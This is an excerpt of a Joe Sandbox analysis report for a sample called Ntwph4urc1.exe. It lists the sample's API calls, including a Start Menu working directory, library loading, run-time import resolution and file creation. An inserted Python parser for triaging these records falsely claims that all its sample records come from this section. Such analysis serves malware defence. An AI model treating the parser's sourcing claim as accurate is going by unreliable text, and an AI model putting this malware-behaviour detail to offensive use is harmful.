                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CloseEnum$DeleteValue
                                            • String ID:
                                            • API String ID: 1354259210-0
                                            • Opcode ID: 62b78b0d49bd01798b93cc74e08c59fab283fd11ef2de5059a0807e48668f6f6
                                            • Instruction ID: 6d47fb934da24c9d717e5f7ce43986d94c12ea4066fa177ccbd406c8c521aae0
                                            • Opcode Fuzzy Hash: 62b78b0d49bd01798b93cc74e08c59fab283fd11ef2de5059a0807e48668f6f6
                                            • Instruction Fuzzy Hash: D1215A71500109BBDF129F90CE89EEF7A7DEB54348F110076F909B21A0E7B49E54AAA8

                                            Control-flow Graph (function starting at 74351777; legend: Executed / Not Executed; graph image not reproduced in text)
                                            APIs
                                              • Part of subcall function 74351B5F: GlobalFree.KERNEL32(?), ref: 74351DD4
                                              • Part of subcall function 74351B5F: GlobalFree.KERNEL32(?), ref: 74351DD9
                                              • Part of subcall function 74351B5F: GlobalFree.KERNEL32(?), ref: 74351DDE
                                            • GlobalFree.KERNEL32(00000000), ref: 74351825
                                            • FreeLibrary.KERNEL32(?), ref: 743518AB
                                            • GlobalFree.KERNELBASE(00000000), ref: 743518D0
                                              • Part of subcall function 7435239E: GlobalAlloc.KERNEL32(00000040,?), ref: 743523CF
                                              • Part of subcall function 74352770: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,743517F6,00000000), ref: 74352840
                                              • Part of subcall function 743515C6: wsprintfW.USER32 ref: 743515F4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1895645572.0000000074351000.00000020.00000001.01000000.00000005.sdmp, Offset: 74350000, based on PE: true
                                            • Associated: 00000005.00000002.1895373883.0000000074350000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000005.00000002.1896009053.0000000074354000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000005.00000002.1896032502.0000000074356000.00000002.00000001.01000000.00000005.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_74350000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                            • String ID:
                                            • API String ID: 3962662361-3916222277
                                            • Opcode ID: e3d3ceca58fc8a0ef5873696ef3434ac0afb494ef4009cf4ddb4893c80f653ba
                                            • Instruction ID: d2def95bea49923d283fe3badea2b06dfc7d8520e80c24c01d2ab8a2c8186967
                                            • Opcode Fuzzy Hash: e3d3ceca58fc8a0ef5873696ef3434ac0afb494ef4009cf4ddb4893c80f653ba
                                            • Instruction Fuzzy Hash: 21419172D002049AEF259F75D884F96F7BCBF04310F244565ED1F9A1A6DBB49385CBA0
                                            APIs
                                              • Part of subcall function 00405D6E: CharNextW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,?,00405DE2,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405B20,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405D7C
                                              • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D81
                                              • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D99
                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                              • Part of subcall function 00405925: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405968
                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,00000000,000000F0), ref: 0040164D
                                            Strings
                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires, xrefs: 00401640
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
                                            • API String ID: 1892508949-2757888794
                                            • Opcode ID: f6ad316e7361aaa2cf963ae545acd1836446b01f1c1828078b15ea3b626ca648
                                            • Instruction ID: df70cc4d1a75ed244d2a997ae4edf05539497ac8b3a7dfb8588bf84231242a1b
                                            • Opcode Fuzzy Hash: f6ad316e7361aaa2cf963ae545acd1836446b01f1c1828078b15ea3b626ca648
                                            • Instruction Fuzzy Hash: 2811E231504104EBCF206FA5CD4099F37B0EF25329B28493BEA11B12F1D63E4A819B5E
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 004020FB
                                              • Part of subcall function 00405456: lstrlenW.KERNEL32(007A0F28,00000000,0079A700,771B23A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                              • Part of subcall function 00405456: lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,771B23A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                              • Part of subcall function 00405456: lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,771B23A0), ref: 004054B1
                                              • Part of subcall function 00405456: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                              • Part of subcall function 00405456: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                              • Part of subcall function 00405456: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                              • Part of subcall function 00405456: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040210C
                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 00402189
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                            • String ID:
                                            • API String ID: 334405425-0
                                            • Opcode ID: af319a29290b029ce5fddf05959ec8084cbb0a0163aa5ce5a800cf6ae1bf2954
                                            • Instruction ID: a0686faca365a727748c0602422b19a99e1e577425e3ae8133f46283b43b75e6
                                            • Opcode Fuzzy Hash: af319a29290b029ce5fddf05959ec8084cbb0a0163aa5ce5a800cf6ae1bf2954
                                            • Instruction Fuzzy Hash: 63219671600104EBCF10AFA5CE49A9E7A71AF55358F70413BF515B91E0CBBD8E829A2E
                                            APIs
                                            • GlobalFree.KERNEL32(00000000), ref: 00401C0B
                                            • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Global$AllocFree
                                            • String ID: Call
                                            • API String ID: 3394109436-1824292864
                                            • Opcode ID: c08fe461fcbc7eb508863a6e274c322000732a28328c89134215c3cfb5836e23
                                            • Instruction ID: 2334a48e4172ebb904b3f5af91f3a45bddc9a396230004d4704967bba2e99f69
                                            • Opcode Fuzzy Hash: c08fe461fcbc7eb508863a6e274c322000732a28328c89134215c3cfb5836e23
                                            • Instruction Fuzzy Hash: 822162736001109BDB20AF64DDC495A73B4AB18328725453BF952F72D0C6B8A8508BAD
                                            APIs
                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000033,00020019), ref: 00402553
                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025F5
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CloseQueryValue
                                            • String ID:
                                            • API String ID: 3356406503-0
                                            • Opcode ID: 8d3d9d412d4888d3c3e3282b3648761cf87a4cea446e4038cc6d0bf9c2fd6c8d
                                            • Instruction ID: ca3dd7d1b7a13d3c8a9a28b827632004175b2a1fd75c59dcebef83c1aa991e75
                                            • Opcode Fuzzy Hash: 8d3d9d412d4888d3c3e3282b3648761cf87a4cea446e4038cc6d0bf9c2fd6c8d
                                            • Instruction Fuzzy Hash: 00113AB1911219EBDF14DFA4DE589AEB774FF04354B20843BE402B62D0D7B88A44DB6E
                                            APIs
                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
                                            • Instruction ID: 3e9f44f44444eb33be3e1f1d809517d1ef13f380758e007b8d3e22890c14ce30
                                            • Opcode Fuzzy Hash: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
                                            • Instruction Fuzzy Hash: 0301F432624220ABE7195B389D05B2A3698E751318F10C13FF855F6AF1EA78CC02DB4D
                                            APIs
                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033,00000002), ref: 0040244E
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402457
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CloseDeleteValue
                                            • String ID:
                                            • API String ID: 2831762973-0
                                            • Opcode ID: 3b2b3679bd27be8986a20790fb1aa9d433e7eb96043e8b231018ce36cdcb7856
                                            • Instruction ID: b1f28ea4fe1f397702134e154a5d50ad3aafc71d487b2ad51b946e19fd30fa70
                                            • Opcode Fuzzy Hash: 3b2b3679bd27be8986a20790fb1aa9d433e7eb96043e8b231018ce36cdcb7856
                                            • Instruction Fuzzy Hash: 3CF09672A00120ABDB10AFA89B4DAAE73B5AF45314F12443FF651B71C1DAFC5D01963E
                                            APIs
                                            • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                            • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Window$EnableShow
                                            • String ID:
                                            • API String ID: 1136574915-0
                                            • Opcode ID: a206bc09d31208a55ef0f8a5c470fd50e96019e1354e9f0dd429e4c405301b30
                                            • Instruction ID: a2c3742fa11dc5cf357e4fc2c1b39d3237f925362780464401897514ce5169fc
                                            • Opcode Fuzzy Hash: a206bc09d31208a55ef0f8a5c470fd50e96019e1354e9f0dd429e4c405301b30
                                            • Instruction Fuzzy Hash: 64E09A72A042009FD704EFA4AE488AEB3B4EB90325B20497FE401F20C1CBB85D00862E
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: ShowWindow
                                            • String ID:
                                            • API String ID: 1268545403-0
                                            • Opcode ID: ed0fba548ae3e193f0e5ef583f5be9fd2d24872a13bb97bcc89e0a3ab6842b84
                                            • Instruction ID: b2fefa23d47a0510f6e3c17d58d1e446f1e854612225740054352d4863a47d08
                                            • Opcode Fuzzy Hash: ed0fba548ae3e193f0e5ef583f5be9fd2d24872a13bb97bcc89e0a3ab6842b84
                                            • Instruction Fuzzy Hash: 5CE0BF76B24114ABCB18DFA8ED90C6E77B6EB95310720847AE512B3690C679AD10CB68
                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                              • Part of subcall function 00406773: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                              • Part of subcall function 00406773: wsprintfW.USER32 ref: 004067C5
                                              • Part of subcall function 00406773: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067D9
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                            • String ID:
                                            • API String ID: 2547128583-0
                                            • Opcode ID: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                            • Instruction ID: 99a4bc67a8c43757839ce5658996565e88f4cb2ecc15aeea03f34014f97f3c52
                                            • Opcode Fuzzy Hash: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                            • Instruction Fuzzy Hash: F2E0863350521056E611AA719D44C7773AC9F89650307843EF946F2080D738DC31ABBD
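The function records on this page (an "APIs" list, the memory-dump source, then the similarity hashes) are uniform enough to parse mechanically, and the record above is the one worth automating: a function that builds a path with GetSystemDirectoryW and wsprintfW, loads it with LoadLibraryExW, and then resolves a symbol with GetProcAddress. The following is an added example, not Joe Sandbox code or output: it parses records in the layout shown on this page, keeps the call-site address and the "Part of subcall" caller for each API line, decodes the dwFlags argument of LoadLibraryExW (the 00000008 in the record above is LOAD_WITH_ALTERED_SEARCH_PATH), and flags functions that resolve imports at run time. The two records in SAMPLE are copied from this section; every function name and triage rule is this example's own. One caveat the rules respect: the argument values in these listings are whatever the sandbox read off the stack at the call site, and a "?" means it could not recover the value, so flag decoding skips unknown arguments rather than guessing.

```python
"""Parse Joe Sandbox 'IDA Plugin' function records and triage them.
Added example for this report, not Joe Sandbox code.  The records in
SAMPLE are copied from this section; every function and rule is this
example's own."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: two records in the layout the report uses.
SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
• GetProcAddress.KERNEL32(00000000,?), ref: 00406810
  • Part of subcall function 00406773: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
  • Part of subcall function 00406773: wsprintfW.USER32 ref: 004067C5
  • Part of subcall function 00406773: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067D9
Memory Dump Source
• Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
APIs
• CreateFileA.KERNELBASE(00000000), ref: 74352BB7
Memory Dump Source
• Source File: 00000005.00000002.1895645572.0000000074351000.00000020.00000001.01000000.00000005.sdmp, Offset: 74350000, based on PE: true
Similarity
• API ID: CreateFile
"""

# One "Name.MODULE(args), ref: ADDR" line; the args and the subcall prefix are optional.
API_RE = re.compile(r"^(?:Part of subcall function ([0-9A-F]{8}): )?"
                    r"(\w+)\.(\w+)(?:\((.*)\))?,? ref: ([0-9A-F]{8})$")
SECTIONS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# dwFlags bits of LoadLibraryExW, values from the Win32 SDK headers.
LOADLIBRARYEX_FLAGS = {0x1: "DONT_RESOLVE_DLL_REFERENCES", 0x2: "LOAD_LIBRARY_AS_DATAFILE",
                       0x8: "LOAD_WITH_ALTERED_SEARCH_PATH", 0x800: "LOAD_LIBRARY_SEARCH_SYSTEM32",
                       0x1000: "LOAD_LIBRARY_SEARCH_DEFAULT_DIRS"}
FILE_APIS = {"CreateFileA", "CreateFileW", "WriteFile", "CreateDirectoryW", "SetFileAttributesW"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list              # argument tokens exactly as the sandbox printed them
    ref: int                # call-site address
    subcall: Optional[int]  # callee this line was lifted from ("Part of subcall"), if any

@dataclass
class FuncRecord:
    apis: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)   # "Source File", "API ID", ...

    @property
    def image_base(self) -> Optional[int]:
        m = re.search(r"Offset: ([0-9A-Fa-f]+)", self.meta.get("Source File", ""))
        return int(m.group(1), 16) if m else None

def parse(text: str) -> list:
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line == "APIs":                      # every record starts here
            cur, section = FuncRecord(), "APIs"
            records.append(cur)
        elif line in SECTIONS:
            section = line
        elif cur is not None and section == "APIs":
            m = API_RE.match(line)
            if m:
                sub, name, mod, args, ref = m.groups()
                cur.apis.append(ApiCall(name, mod, args.split(",") if args else [],
                                        int(ref, 16), int(sub, 16) if sub else None))
        elif cur is not None:                   # "Key: value" lines of the other sections
            key, _, val = line.partition(": ")
            cur.meta[key] = val
    return records

def decode_flags(value: int) -> list:
    return [n for bit, n in sorted(LOADLIBRARYEX_FLAGS.items()) if value & bit]

def triage(rec: FuncRecord) -> list:
    out = []
    if any(a.name == "GetProcAddress" for a in rec.apis):
        out.append("resolves imports at run time (GetProcAddress)")
    for a in rec.apis:
        # args[2] is dwFlags; "?" means the sandbox could not recover it, so do not guess.
        if a.name.startswith("LoadLibraryEx") and len(a.args) >= 3 and a.args[2] != "?":
            flags = int(a.args[2], 16)
            out.append("LoadLibraryEx flags 0x%X: %s" % (flags, ", ".join(decode_flags(flags)) or "none"))
        elif a.name in FILE_APIS:
            out.append("file-system API: " + a.name)
    return out

if __name__ == "__main__":
    for r in parse(SAMPLE):
        print("0x%08X %-60s %s" % (r.image_base, r.meta.get("API ID", "?"), "; ".join(triage(r)) or "-"))
```

Run it directly to get one line per function. Note that the CreateFileA record comes from a dump at image base 74350000, not 00400000, so the same listing mixes functions from different modules; compare call-site addresses only within one image_base.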
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: File$AttributesCreate
                                            • String ID:
                                            • API String ID: 415043291-0
                                            • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                            • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
